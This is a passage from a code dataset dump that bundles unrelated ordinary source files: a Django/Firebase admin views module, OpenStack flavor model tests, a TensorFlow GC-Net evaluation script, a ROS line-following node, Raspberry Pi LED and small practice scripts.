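print()  # -> +-+-+-+-+-+-
```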
bucket.blob(str(imagePath))\n blob.upload_from_file(imagePath, content_type='image/jpg')\n blob.make_public()\n # print(imagePath)\n db.collection('events').document().set({\n \"eventName\": form.cleaned_data.get('eventname'),\n \"eventLocation\": form.cleaned_data.get('eventlocation'),\n \"eventDate\": form.cleaned_data.get('birthday'),\n \"eventMessage\": form.cleaned_data.get('eventmessage'),\n \"img\": blob.public_url,\n \"createdAt\": datetime.datetime.now()\n })\n messages.success(request, 'Added To Database')\n\n else:\n messages.success(request, 'Added')\n\n context = {\n \"form\": form,\n \"userslist\": auth.list_users().iterate_all()\n }\n return render(request, 'addevent.html', context)\n\n\n@login_required(login_url='login')\ndef eventList(request):\n dataN = db.collection('events')\n qs = dataN.order_by(\n u'createdAt', direction=firestore.Query.DESCENDING)\n events = qs.stream()\n context = {\n \"data\": events\n }\n return render(request, 'eventlist.html', context)\n\n\n@login_required(login_url='login')\ndef bookingList(request):\n dataN = db.collection('bookings')\n qs = dataN.order_by(\n u'createdAt', direction=firestore.Query.DESCENDING)\n bookings = qs.stream()\n context = {\n \"data\": bookings\n }\n return render(request, 'bookings.html', context)\n\n\n@login_required(login_url='login')\ndef deleteEvent(request, pk):\n db.collection('events').document(pk).delete()\n return redirect('eventlist')\n\n\n@login_required(login_url='login')\ndef usersList(request):\n if request.method == 'POST':\n getStatus = request.POST.get('status')\n getuserId = request.POST.get('userid')\n setStatus = ref.child(getuserId)\n setStatus.set({\n \"key\": getuserId,\n \"value\": getStatus\n })\n###########################################################################################################################\n obj = ref.get()\n context = {\n \"data\": db.collection('users').get(),\n \"activestatus\": obj\n }\n return render(request, 'users.html', context)\n\n\n@login_required(login_url='login')\ndef deleteuser(request, uid):\n # auth.delete_user(uid)\n finuser = auth.list_users().iterate_all()\n for user in finuser:\n if user.email == uid:\n auth.delete_user(user.uid)\n db.collection('users').document(uid).delete()\n return redirect('users')\n\n\n@login_required(login_url='login')\ndef deleteBooking(request, uid):\n db.collection('bookings').document(uid).delete()\n return redirect('bookinglist')\n\n\n# media upod view\n@login_required(login_url='login')\ndef mediaUploadView(request):\n form = AddMediaForm()\n if request.method == 'POST':\n form = AddMediaForm(request.POST, request.FILES)\n if form.is_valid():\n extesionss, ext = os.path.splitext(str(request.FILES['file']))\n imagePath = request.FILES['file']\n letters = string.ascii_lowercase\n result_str = ''.join(random.choice(letters) for i in range(0,5))\n blob = bucket.blob(result_str + str(imagePath))\n blob.upload_from_file(imagePath, content_type=ext)\n blob.make_public()\n # print('hiiiiiiiiii',blob.public_url)\n # print(form.cleaned_data.get('mediaUrl'))\n\n db.collection('media').document().set({\n \"img\": blob.public_url,\n \"type\": ext\n })\n \n print(form.errors)\n # else:\n # print('erros')\n context = {\n \"form\": form\n }\n return render(request, 'media.html', context)\n\n# media upod view\n@login_required(login_url='login')\ndef mediaUploadYoutubeView(request):\n if request.method == 'POST':\n db.collection('media').document().set({\n \"img\": request.POST.get('mediaUrl'),\n \"type\": 'ytVideo'\n })\n return 
render(request, 'yt.html')\n\n\n@login_required(login_url=\"login\")\ndef mediaView(request):\n    data = db.collection('media').get()\n    if request.method == 'POST':\n        getID = request.POST.get('docid')\n        getobj = request.POST.get('obj')\n        try:\n            db.collection('media').document(getID).delete()\n            x = getobj.rsplit('/', 1)\n            bucket.blob(x[1]).delete()\n            return redirect('gallery')\n        except:\n            pass\n\n    context = {\n        \"data\": data\n    }\n    return render(request, 'mediaview.html', context)\n\n\n@login_required(login_url='login')\ndef mediaDeleteView(request, id):\n    if request.method == 'POST':\n        getobj = request.POST.get('obj')\n        x = getobj.split('/')\n        print(x)\n        # bucket.file().delete(id)\n    return HttpResponse('done')\n\n\n@login_required(login_url='login')\ndef SendMsg(request):\n    usersList = db.collection('users').get()\n    registration_token = ''\n    if request.method == 'POST':\n        uids = request.POST.get('userid')\n        device = request.POST.get('device')\n        title = request.POST.get('title')\n        msg = request.POST.get('message')\n        frm = request.POST.get('from')\n        for user in usersList:\n            if user.to_dict()['uid'] == uids:\n                registration_token += user.to_dict()['key']\n                print(user.to_dict()['key'])\n                if user.to_dict()['device'] == \"android\":\n                    message = messaging.Message(\n                        android=messaging.AndroidConfig(\n                            ttl=datetime.timedelta(seconds=3600),\n                            priority='normal',\n                            notification=messaging.AndroidNotification(\n                                title= title,\n                                body= msg\n                            ),\n                        ), \n                        token=registration_token,\n                    )\n                else:\n                    message = messaging.Message(\n                        apns=messaging.APNSConfig(\n                            headers={'apns-priority': '10'},\n                            payload=messaging.APNSPayload(\n                                aps=messaging.Aps(\n                                    alert=messaging.ApsAlert(\n                                        title=title,\n                                        body=msg\n                                    ),\n                                    badge=42,\n                                ),\n                            ),\n                        ),\n                        token=registration_token,\n                    )\n                \n                response = messaging.send(message)\n                print(response)\n                # [START apns_message]\n                \n                # [END apns_message]\n                # return message\n\n        db.collection('notification').document().set({\n            \"userid\": uids,\n            \"from\": frm,\n            \"title\": title,\n            \"message\": msg,\n            \"createdAt\": datetime.datetime.now()\n        })\n        # Response is a message ID string.\n    context = {\n        \"userslist\": usersList\n    }\n    return render(request, 'notify.html', context)\n\n\n@login_required(login_url='login')\ndef notifyListView(request, *args, **kwargs):\n    dataN = db.collection('notification')\n    qs = dataN.order_by(\n        u'createdAt', direction=firestore.Query.DESCENDING)\n    noti = qs.stream()\n    context = {\n        \"data\": noti,\n        \"fewUsers\": db.collection('users').get()\n    }\n    return render(request, 'notifyview.html', context)\n\n\n@login_required(login_url='login')\ndef notifydeletetView(request, uid):\n    db.collection('notification').document(uid).delete()\n    return redirect('noifyview')\n\n\n@login_required(login_url='login')\ndef editUser(request, uid):\n    data = db.collection('users').get()\n    final = []\n    docId = ''\n    for user in data:\n        if user.to_dict()['uid'] == uid:\n            final.append(user)\n            docId = user.id\n    if request.method == 'POST':\n        user = request.POST.get('username')\n        userphone = request.POST.get('userphone')\n        db.collection('users').document(str(docId)).update({\n            \"name\": user,\n            \"phone\": userphone\n        })\n        return redirect('users')\n    context = {\n        \"data\": final\n    }\n    return render(request, 'editUser.html', context)\n","sub_path":"main/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":10304,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} {"seq_id":"306489379","text":"# Print + and - alternately\n\n# print('Printing + and - alternately.')\n# n = 
int(input('How many should be printed? (enter an integer): '))\n\n# for i in range(n // 2):\n#     print('+-', end='')\n\n# if n % 2:\n#     print('+', end='')\n\n# Print n asterisks, with a line break every w of them.\n\nn, w = 14, 5\n\nfor i in range(n // w):\n    print('*' * w)\n\nrest = n % w\nif rest:\n    print('*' * rest)","sub_path":"Practice_Algorithm/plusMinus.py","file_name":"plusMinus.py","file_ext":"py","file_size_in_byte":406,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} {"seq_id":"419513623","text":"import json\nimport flavorsync.test.util as util\n\nfrom novaclient.v2.flavors import Flavor as OpenStackFlavor\n\nfrom flavorsync.model import Infrastructure, Flavor, FlavorCollection\n\ndef deserialize_xml_infrastructure_test():\n    data = util.load_clean_xml_payload('infrastructure_request.xml')\n    infrastructure = Infrastructure.deserialize(util.XML_MIMETYPE, data)\n    _check_infrastructure_model_contents(infrastructure)\n\ndef deserialize_json_infrastructure_test():\n    data = util.load_json_from_file('infrastructure_request.json')\n    infrastructure = Infrastructure.deserialize(util.JSON_MIMETYPE, json.dumps(data))\n    _check_infrastructure_model_contents(infrastructure)\n    \ndef deserialize_wrong_mimetype_infrastructure_test():\n    data = util.load_json_from_file('infrastructure_request.json')\n    \n    try:\n        Infrastructure.deserialize(util.WRONG_MIMETYPE, data)\n        assert False\n    except NotImplementedError as e:\n        assert 'Unrecognized mimetype or model type' in str(e)\n    \n    \ndef serialize_xml_infrastructure_test():\n    data = util.load_clean_xml_payload('infrastructure_response.xml')\n    \n    infrastructure = util.create_example_infrastructure()\n    \n    infrastructure_xml = infrastructure.serialize(util.XML_MIMETYPE).decode('utf-8')\n    assert infrastructure_xml in data\n    \ndef serialize_json_infrastructure_test():\n    file_json = util.load_json_from_file('infrastructure_response.json')\n    \n    infrastructure = util.create_example_infrastructure()\n    \n    infrastructure_json = infrastructure.serialize(util.JSON_MIMETYPE)\n    assert util.json_are_equal(infrastructure_json, file_json)\n    \ndef serialize_wrong_mimetype_infrastructure_test():\n    infrastructure = util.create_example_infrastructure()\n    \n    try:\n        infrastructure.serialize(util.WRONG_MIMETYPE)\n        assert False\n    except NotImplementedError as e:\n        assert 'Unrecognized mimetype or model type' in str(e)\n    \ndef infrastructure_to_content_dict_test():\n    infrastructure = util.create_example_infrastructure()\n    assert 'Mordor' in infrastructure._to_content_dict()\n    \ndef infrastructure_to_dict_test():\n    expected_dict = {\"infrastructure\": {\"name\" : \"Mordor\"}}\n    infrastructure = util.create_example_infrastructure()\n    assert expected_dict == infrastructure.to_dict()\n\n\n\n\ndef deserialize_xml_flavor_test():\n    data = util.load_clean_xml_payload('flavor_creation_request.xml')\n    flavor = Flavor.deserialize(util.XML_MIMETYPE, data)\n    _check_flavor_model_contents(flavor)\n\ndef deserialize_json_flavor_test():\n    data = util.load_json_from_file('flavor_creation_request.json')\n    flavor = Flavor.deserialize(util.JSON_MIMETYPE, json.dumps(data))\n    _check_flavor_model_contents(flavor)\n    \ndef deserialize_wrong_mimetype_flavor_test():\n    data = util.load_json_from_file('flavor_creation_request.json')\n    \n    try:\n        Flavor.deserialize(util.WRONG_MIMETYPE, data)\n        assert False\n    except NotImplementedError as e:\n        assert 'Unrecognized mimetype or model type' in str(e)\n    \ndef serialize_xml_flavor_test():\n    data = util.load_clean_xml_payload('flavor_response.xml')\n    \n    flavor = 
util.create_example_flavor()\n \n flavor_xml = flavor.serialize(util.XML_MIMETYPE).decode('utf-8')\n assert flavor_xml in data\n \ndef serialize_json_flavor_test():\n file_json = util.load_json_from_file('flavor_response.json')\n \n flavor = util.create_example_flavor()\n \n flavor_json = flavor.serialize(util.JSON_MIMETYPE)\n assert util.json_are_equal(flavor_json, file_json)\n \ndef serialize_wrong_mimetype_flavor_test():\n flavor = util.create_example_flavor()\n \n try:\n flavor.serialize(util.WRONG_MIMETYPE)\n assert False\n except NotImplementedError as e:\n assert 'Unrecognized mimetype or model type' in str(e)\n \ndef flavor_to_content_dict_test():\n data = util.load_json_from_file('flavor_response.json')\n \n flavor = util.create_example_flavor()\n \n assert util.json_are_equal(data['flavor'], flavor._to_content_dict())\n \ndef flavor_to_dict_test():\n expected_dict = util.load_json_from_file('flavor_response.json')\n \n flavor = util.create_example_flavor()\n \n assert util.json_are_equal(expected_dict, flavor.to_dict())\n \ndef from_openstack_flavor_test():\n data = util.load_json_from_file('flavor_response.json')\n openstackflavor = OpenStackFlavor(None, data['flavor'])\n \n infrastructure = util.create_example_infrastructure()\n \n flavor = util.create_example_flavor()\n \n converted_flavor = Flavor.from_openstack_flavor(openstackflavor, infrastructure)\n \n assert util.json_are_equal(flavor.to_dict(), converted_flavor.to_dict())\n\n\n\n\ndef serialize_xml_flavor_collection_test():\n data = util.load_clean_xml_payload('flavor_collection_response.xml')\n \n flavor_collection = util.create_example_flavor_collection()\n \n flavor_collection_xml = flavor_collection.serialize(util.XML_MIMETYPE).decode('utf-8')\n assert flavor_collection_xml in data\n \ndef serialize_xml_empty_flavor_collection_test():\n data = ''\n data += ''\n \n flavor_collection = FlavorCollection([])\n \n flavor_collection_xml = flavor_collection.serialize(util.XML_MIMETYPE).decode('utf-8')\n assert flavor_collection_xml in data\n \ndef serialize_json_flavor_collection_test():\n file_json = util.load_json_from_file('flavor_collection_response.json')\n \n flavor_collection = util.create_example_flavor_collection()\n \n flavor_collection_json = flavor_collection.serialize(util.JSON_MIMETYPE)\n assert util.json_are_equal(flavor_collection_json, file_json)\n \ndef serialize_json_empty_flavor_collection_test():\n data = '{\"flavors\":[]}'\n \n flavor_collection = FlavorCollection([])\n \n flavor_collection_json = flavor_collection.serialize(util.JSON_MIMETYPE)\n assert util.json_are_equal(flavor_collection_json, data)\n \ndef serialize_wrong_mimetype_flavor_collection_test():\n flavor_collection = util.create_example_flavor_collection()\n \n try:\n flavor_collection.serialize(util.WRONG_MIMETYPE)\n assert False\n except NotImplementedError as e:\n assert 'Unrecognized mimetype or model type' in str(e)\n \ndef flavor_collection_to_dict_test():\n expected_dict = util.load_json_from_file('flavor_collection_response.json')\n \n flavor_collection = util.create_example_flavor_collection()\n \n assert util.json_are_equal(expected_dict, flavor_collection.to_dict())\n \ndef emtpy_flavor_collection_to_dict_test():\n expected_dict = {\"flavors\":[]}\n \n flavor_collection = FlavorCollection([])\n \n assert util.json_are_equal(expected_dict, flavor_collection.to_dict())\n \ndef from_openstack_flavor_list_test():\n data = util.load_json_from_file('flavor_collection_response.json')\n \n for flavor in data['flavors']:\n 
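# Strip the 'nodes' key before wrapping the fixtures: a plain OpenStack flavor payload does not carry it (an assumption read off this test's setup rather than the novaclient docs).\n        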
del(flavor['nodes'])\n \n openstackflavors = [OpenStackFlavor(None, data['flavors'][0]),\n OpenStackFlavor(None, data['flavors'][1])]\n \n mordor = util.create_example_infrastructure()\n \n flavor_collection = util.create_example_flavor_collection(mordor)\n for flavor in flavor_collection.flavors:\n flavor.public = False\n \n converted_collection = FlavorCollection.from_openstack_flavor_list(\n openstackflavors, mordor)\n \n assert util.json_are_equal(\n flavor_collection.to_dict(), converted_collection.to_dict())\n \ndef from_empty_openstack_flavor_list_test():\n mordor = util.create_example_infrastructure()\n \n flavor_collection = FlavorCollection([])\n \n converted_collection = FlavorCollection.from_openstack_flavor_list(\n [], mordor)\n \n assert util.json_are_equal(\n flavor_collection.to_dict(), converted_collection.to_dict())\n \ndef flavor_collection_extend_list_test():\n flavor1 = util.create_example_flavor()\n flavor2 = util.create_secondary_example_flavor()\n \n flavor_collection1 = FlavorCollection([])\n flavor_collection2 = FlavorCollection([flavor1])\n flavor_collection3 = FlavorCollection([flavor2])\n \n flavors = [flavor1]\n flavor_collection1.extend(flavor_collection2)\n \n assert flavor_collection1.flavors == flavors\n \n flavors = [flavor1, flavor2]\n flavor_collection1.extend(flavor_collection3)\n \n assert flavor_collection1.flavors == flavors\n\ndef _check_infrastructure_model_contents(model):\n expected_infrastructure = util.create_example_infrastructure()\n \n assert expected_infrastructure.name in model.name\n assert expected_infrastructure.keystone_url in model.keystone_url\n assert expected_infrastructure.username in model.username\n assert expected_infrastructure.password in model.password\n assert expected_infrastructure.tenant in model.tenant\n\ndef _check_flavor_model_contents(model):\n expected_flavor = util.create_example_flavor()\n \n assert expected_flavor.name in model.name\n assert expected_flavor.vcpus == model.vcpus\n assert expected_flavor.ram == model.ram\n assert expected_flavor.disk == model.disk\n assert expected_flavor.swap == model.swap","sub_path":"flavorsync/test/model_unit_tests.py","file_name":"model_unit_tests.py","file_ext":"py","file_size_in_byte":9320,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"403003443","text":"import sys\r\nimport io\r\nimport requests, json\r\n\r\nsys.stdout = io.TextIOWrapper(sys.stdout.detach(), encoding = 'utf-8')\r\nsys.stderr = io.TextIOWrapper(sys.stderr.detach(), encoding = 'utf-8')\r\n\r\n\r\ns= requests.Session()\r\n\r\n\r\nr= s.get('http://httpbin.org/stream/20', stream=True)\r\n#print(r.text)\r\n#print(r.encoding) #인코딩이 어떤것으로 되어있는지 확인\r\n#print(r.json()) #json인가 확인하는 코딩문\r\n\r\nif r.encoding is None:\r\n r.encoding = 'utf-8'\r\n\r\nfor line in r.iter_lines(decode_unicode=True):\r\n #print(line)\r\n b =json.loads(line) #dict 임\r\n for e in b.keys():\r\n print(\"key:\",e,\"values:\",b[e])\r\n","sub_path":"section3/download3-2-3.py","file_name":"download3-2-3.py","file_ext":"py","file_size_in_byte":639,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"630802055","text":"# Copyright 2015 The TensorFlow Authors. 
All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# ==============================================================================\n\n\"\"\"\nEvaluation for GC-Net on KITTI.\n\"\"\"\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nfrom datetime import datetime\nimport math\nimport time\nimport os\nimport numpy as np\nimport tensorflow as tf\n\nimport gcnet_model\nimport image_processing_KITTI\nfrom KITTI_data import KITTIData\n#from tensorflow.python import debug as tf_debug\n\nFLAGS = tf.app.flags.FLAGS\nBATCH_SIZE = 1\n#NUM_EVAL_SAMPLES = 4843\n\n#tf.app.flags.DEFINE_string('dataset', 'KITTI', '')\ntf.app.flags.DEFINE_string('mode', 'eval', 'mode')\ntf.app.flags.DEFINE_boolean('debug', False,\n \"\"\"Whether to show verbose summaries.\"\"\")\ntf.app.flags.DEFINE_string('log_root', '/home/laoreja/tf/log/kitti_from_retrain_6',\n \"\"\"Directory where to write event logs' parent.\"\"\")\ntf.app.flags.DEFINE_string('checkpoint_dir', '/home/laoreja/tf/log/kitti_from_retrain_6/train',\n \"\"\"Directory where to read model checkpoints.\"\"\")\ntf.app.flags.DEFINE_integer('eval_interval_secs', 60 * 5,\n \"\"\"How often to run the eval.\"\"\")\ntf.app.flags.DEFINE_boolean('run_once', True,\n \"\"\"Whether to run eval only once.\"\"\")\n\n\ndef eval_once(saver, summary_writer, op_list, summary_op):\n \"\"\"Run Eval once.\n\n Args:\n saver: Saver.\n summary_writer: Summary writer.\n op_list: List of ops for evaluation. 
Need computing the average of each of them.\n summary_op: Summary op.\n \"\"\"\n len_op_list = len(op_list)\n with tf.Session(config=tf.ConfigProto(allow_soft_placement = True)) as sess:\n ckpt = tf.train.get_checkpoint_state(FLAGS.checkpoint_dir)\n if ckpt and ckpt.model_checkpoint_path:\n # Restores from checkpoint\n tf.logging.info('restore from %s' % ckpt.model_checkpoint_path)\n saver.restore(sess, ckpt.model_checkpoint_path)\n # Assuming model_checkpoint_path looks something like:\n # /my-favorite-path/cifar10_train/model.ckpt-0,\n # extract global_step from it.\n global_step = ckpt.model_checkpoint_path.split('/')[-1].split('-')[-1]\n else:\n print('No checkpoint file found')\n return\n\n # Start the queue runners.\n coord = tf.train.Coordinator()\n try:\n threads = []\n for qr in tf.get_collection(tf.GraphKeys.QUEUE_RUNNERS):\n threads.extend(qr.create_threads(sess, coord=coord, daemon=True,\n start=True))\n tf.logging.info('starts evaluation!')\n\n num_iter = NUM_EVAL_SAMPLES\n avg_list = [0.0 for i in range(len_op_list)]\n step = 0\n while step < num_iter and not coord.should_stop():\n res_list = sess.run(op_list)\n for i in range(len_op_list):\n avg_list[i] += res_list[i]\n step += 1\n print(res_list)\n \n if step % 50 == 0:\n# print('step: ', step, res_list)\n summary_str = sess.run(summary_op)\n summary_writer.add_summary(summary_str, step)\n\n # Compute averages of evaluating criteria\n for i in range(len_op_list):\n avg_list[i] /= (num_iter * 1.0)\n \n print('avg res:', avg_list)\n\n# summary = tf.Summary()\n# summary.ParseFromString(sess.run(summary_op))\n \n# for i in range(len_op_list):\n# summary.value.add(tag='avg_'+str(i), simple_value=avg_list[i])\n except Exception as e: # pylint: disable=broad-except\n coord.request_stop(e)\n\n coord.request_stop()\n coord.join(threads, stop_grace_period_secs=10)\n\n\ndef evaluate(hps, dataset):\n \"\"\"Eval for a number of steps.\"\"\"\n with tf.Graph().as_default() as g:\n # Get inputs. 
You may write them to summary.\n num_preprocess_threads = FLAGS.num_preprocess_threads\n left_images, right_images, disparitys, masks = image_processing_KITTI.inputs(\n dataset,\n batch_size = hps.batch_size,\n num_preprocess_threads=num_preprocess_threads)\n tf.summary.image('left_image', left_images)\n tmp = tf.expand_dims(disparitys, axis=3)\n tf.summary.image('disparity', tmp)\n tmp = tf.expand_dims(masks, axis=3)\n tf.summary.image('masks', tmp)\n tf.summary.image('masked_disparity', tf.expand_dims(disparitys * masks, axis=3))\n\n # Build a Graph that computes the disparity predictions from the\n # inference model.\n model = gcnet_model.GCNet(hps, left_images, right_images, disparitys, masks, 'eval') # \n model.build_graph_to_loss()\n\n # Restore the moving average version of the learned variables for eval.\n# variable_averages = tf.train.ExponentialMovingAverage(\n# gcnet_model.MOVING_AVERAGE_DECAY)\n# variables_to_restore = variable_averages.variables_to_restore()\n# saver = tf.train.Saver(variables_to_restore)\n saver = tf.train.Saver()\n\n # Build the summary operation based on the TF collection of Summaries.\n tf.summary.image('predict', tf.expand_dims(model.predicted_disparity, axis=3)) \n tf.summary.image('masked_predict', tf.expand_dims(model.predicted_disparity * masks, axis=3))\n summary_op = tf.summary.merge_all()\n\n summary_writer = tf.summary.FileWriter(FLAGS.eval_dir, g)\n\n while True:\n eval_once(saver, summary_writer, [model.abs_loss, model.larger_than_3px, model.larger_than_5px, model.larger_than_7px], summary_op)\n if FLAGS.run_once:\n break\n time.sleep(FLAGS.eval_interval_secs)\n\n\ndef main(argv=None): # pylint: disable=unused-argument\n\n dataset = KITTIData('train')\n assert dataset.data_files()\n global NUM_EVAL_SAMPLES\n NUM_EVAL_SAMPLES = dataset.num_examples_per_epoch()\n \n FLAGS.eval_dir = os.path.join(FLAGS.log_root, 'train_eval')\n \n if tf.gfile.Exists(FLAGS.eval_dir):\n tf.gfile.DeleteRecursively(FLAGS.eval_dir)\n tf.gfile.MakeDirs(FLAGS.eval_dir)\n\n# Indeed, the lrn_rate and weight_decay_rate have no use.\n hps = gcnet_model.HParams(batch_size=BATCH_SIZE,\n lrn_rate=0.0,\n weight_decay_rate=0.0,\n relu_leakiness=0.1,\n optimizer='RMSProp',\n max_disparity=192) \n\n evaluate(hps, dataset)\n\n\nif __name__ == '__main__':\n tf.logging.set_verbosity(tf.logging.DEBUG) \n tf.app.run()\n","sub_path":"reimplement_GC_Net/gcnet_eval_kitti.py","file_name":"gcnet_eval_kitti.py","file_ext":"py","file_size_in_byte":6921,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"134357640","text":"import RPi.GPIO as GPIO \n\nimport time \nimport time\nimport serial\nimport binascii\n\n \n\nGPIO.setmode(GPIO.BCM)\n\nGPIO.setwarnings(False) \n\n# Pin Numbers\nred_led = 18\ngreen_led = 24\nblue_led = 25\n\n# Set pins to output mode\nGPIO.setup(red_led, GPIO.OUT)\nGPIO.setup(green_led, GPIO.OUT)\nGPIO.setup(blue_led, GPIO.OUT)\n\nwhile True:\n #RED LED\n GPIO.output(red_led,GPIO.HIGH)\n time.sleep(1)\n GPIO.output(red_led,0)\n #GREEN LED\n GPIO.output(green_led,GPIO.HIGH)\n time.sleep(1)\n GPIO.output(green_led,0)\n #BLUE LED\n GPIO.output(blue_led,GPIO.HIGH)\n time.sleep(1)\n GPIO.output(blue_led,0)\n\nGPIO.cleanup()\n\n","sub_path":"pi/Desktop/SRTS_Code/LEDStrip.py","file_name":"LEDStrip.py","file_ext":"py","file_size_in_byte":629,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"443758524","text":"# Write a function called return_day, this function takes in one 
parameter (a number from 1-7) and returns the day of the week. If the number is less than 1 or greater than 7, the function should return None\n# Way_01\ndef return_day(num):\n\tdays = [\"Sunday\",\"Monday\", \"Tuesday\",\"Wednesday\",\"Thursday\",\"Friday\",\"Saturday\"]\n\t# Check to see if num is valid (1 through 7 inclusive)\n\tif num > 0 and num <= len(days):\n\t\treturn days[num-1]\n\treturn None\nprint(return_day(5)) # Thursday\n# Way_02\ndef return_day(num):\n\t# Guard against zero/negative input: negative indexing would otherwise return a day instead of None\n\tif num < 1:\n\t\treturn None\n\ttry:\n\t\treturn [\"Sunday\",\"Monday\", \"Tuesday\",\"Wednesday\",\"Thursday\",\"Friday\",\"Saturday\"][num-1]\n\texcept IndexError:\n\t\treturn None\nprint(return_day(7)) # Saturday\nprint(return_day(6)) # Friday","sub_path":"Basics/41_Functions_Ex_01.py","file_name":"41_Functions_Ex_01.py","file_ext":"py","file_size_in_byte":677,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} {"seq_id":"203931346","text":"#drive_one_line\n\n#!/usr/bin/env python\nimport rospy\nfrom math import sqrt\nfrom math import radians\nimport math\nfrom std_msgs.msg import String\nfrom std_msgs.msg import Float32\nfrom std_msgs.msg import Int16MultiArray\nfrom nav_msgs.msg import Odometry\nfrom std_msgs.msg import UInt8\nfrom std_msgs.msg import Int16\nimport time\n\n\n# from line_detection import CarPosition\n\n\nepsilon = 0.05\nspeed_rpm = 200\nangle_straight = 90\nangle_left = 20\nangle_right = 20\n\ncallbackCnt = 0\ntimestamp = time.time()\n\noffsetAvg = 0\ncircleAvg = 0\noffsetNum = 0\nangleAvg = 0\nlast_odom = None\nis_active = False\n\ndef KP(num):\n    return 0.35 * num\n\ndef callbackOdom(msg):\n    global last_odom\n    last_odom = msg\n\ndef callbackDriveOnLine(data):\n    global callbackCnt\n    global timestamp\n    global offsetAvg\n    global circleAvg\n    global offsetNum\n\n    if \"None\" in data.data:\n        return\n\n    recData = data.data.split(':')\n    radius = math.log(int(recData[0]),2)\n    print(\"Radius: {}\".format(data.data))\n\n    #circleAvg\n    offsetAvg += int(recData[1])\n    offsetNum += 1\n    angle = angle_straight\n\n    if (time.time()-timestamp) >= 0.5:\n        off = offsetAvg/offsetNum\n        angle -= KP(0.5*off + 0.5*radius)\n        print(\"angle: {}\".format(angle))\n        pub_steering.publish(abs(angle))\n\n        timestamp = time.time()\n\n        offsetAvg=0\n        offsetNum=0\n\n        newSpeed = speed_rpm\n        if radius >= 18:\n            newSpeed = speed_rpm + 100\n        print(\"New Speed {}\".format(newSpeed))\n        pub_speed.publish(newSpeed)\n    else:\n        callbackCnt += 1\n\n\n\nrospy.init_node(\"line\", anonymous=True)\nrospy.Subscriber(\"/Offset\", String, callbackDriveOnLine)\n\nsub_odom = rospy.Subscriber(\"odom\", Odometry, callbackOdom, queue_size=10)\n\npub_back_left = rospy.Publisher(\n    \"simple_drive_control/backward_left\",\n    Float32,\n    queue_size=10)\npub_back_right = rospy.Publisher(\n    \"simple_drive_control/backward_right\",\n    Float32,\n    queue_size=10)\npub_back = rospy.Publisher(\n    \"simple_drive_control/backward\",\n    Float32,\n    queue_size=10)\npub_forward = rospy.Publisher(\n    \"simple_drive_control/forward\",\n    Float32,\n    queue_size=10)\npub_speed = rospy.Publisher(\n    \"manual_control/speed\",\n    Int16,\n    queue_size=10)\npub_steering = rospy.Publisher(\n    \"steering\",\n    UInt8,\n    queue_size=10)\npub_stop_start = rospy.Publisher(\n    \"manual_control/stop_start\",\n    Int16,\n    queue_size=100)\npub_info = rospy.Publisher(\n    \"simple_drive_control/info\",\n    String,\n    
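# queue_size bounds rospy's asynchronous publish buffer; excess unsent messages are dropped.\n    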
queue_size=10)\n\nrospy.spin()\n","sub_path":"tasks_wise1819/ub08/drive_one_line5.py","file_name":"drive_one_line5.py","file_ext":"py","file_size_in_byte":2528,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"469694116","text":"#!/usr/bin/env python\n# -*- coding:Utf-8 -*-\n\n#\n# Modules\n#\n\nimport collections\n\nimport logging\nlogger = logging.getLogger( \"base.Cache.CacheDict\" )\n\n#\n# Class\n#\n\nclass CacheDict( collections.OrderedDict ):\n\t\"\"\"\n\tCustom ordered dict for Cache\n\t\"\"\"\n\tdef __init__( self, *args, **kwargs ):\n\t\tcollections.OrderedDict.__init__( self )\n\t\tself.update( *args, **kwargs )\n\t\n\tdef __setitem__( self, key, value ):\n\t\t\"\"\"\n\t\tSet item ; item always go to the end of the dict\n\t\t\"\"\"\n\t\tif( self.has_key( key ) ):\n\t\t\tdel self[ key ]\n\t\tcollections.OrderedDict.__setitem__( self, key, value )\n","sub_path":"dev_chaos/base/cache/CacheDict.py","file_name":"CacheDict.py","file_ext":"py","file_size_in_byte":573,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"386599977","text":"import sys\n\ninput = sys.stdin.readline\nmod = int(1e9)+7\n\ndef multiply(matrix1, matrix2): # 행렬 곱셈\n output = []\n for i in range(2):\n output.append([])\n for j in range(2):\n tmp = 0\n for k in range(2):\n tmp += matrix1[i][k] * matrix2[k][j]\n output[i].append(tmp%mod)\n return output\n\ndef power(matrix, n): # 거듭제곱 분할정복\n if n == 1: return matrix\n tmp = power(matrix, n//2)\n if n%2 == 0:\n return multiply(tmp, tmp)\n else:\n return multiply(multiply(tmp, tmp), matrix)\n\nN = int(input().rstrip())\nmatrix = [[1, 1], [1, 0]] # 피보나치 행렬 거듭제곱 일반항\nprint(power(matrix, N)[0][1])\n\n\"\"\"\n피보나치 일반항을, 행렬의 거듭제곱으로 변환할 줄 알아야 하고\n행렬의 거듭제곱을 할 줄 알아야 하고\n거듭제곱을 분할정복으로 할 줄 알아야 풀 수 있는 문제이다\n2022-10-08기준, 가장 빠른 속도로 피보나치를 구할 수 있는 코드이다\n\n<참고한 링크>\n참고한 코드 원문\nhttps://ca.ramel.be/50\n\n백준 피보나치 블로그글\nhttps://www.acmicpc.net/blog/view/28\n\n피보나치가 [1, 1],[1, 0]의 거듭제곱이 되는 과정\nhttps://www.youtube.com/watch?v=uX2IsIykLJc\n\"\"\"\n\n# https://www.acmicpc.net/problem/11444","sub_path":"알고리즘/[템플릿]/분할정복/피보나치 수 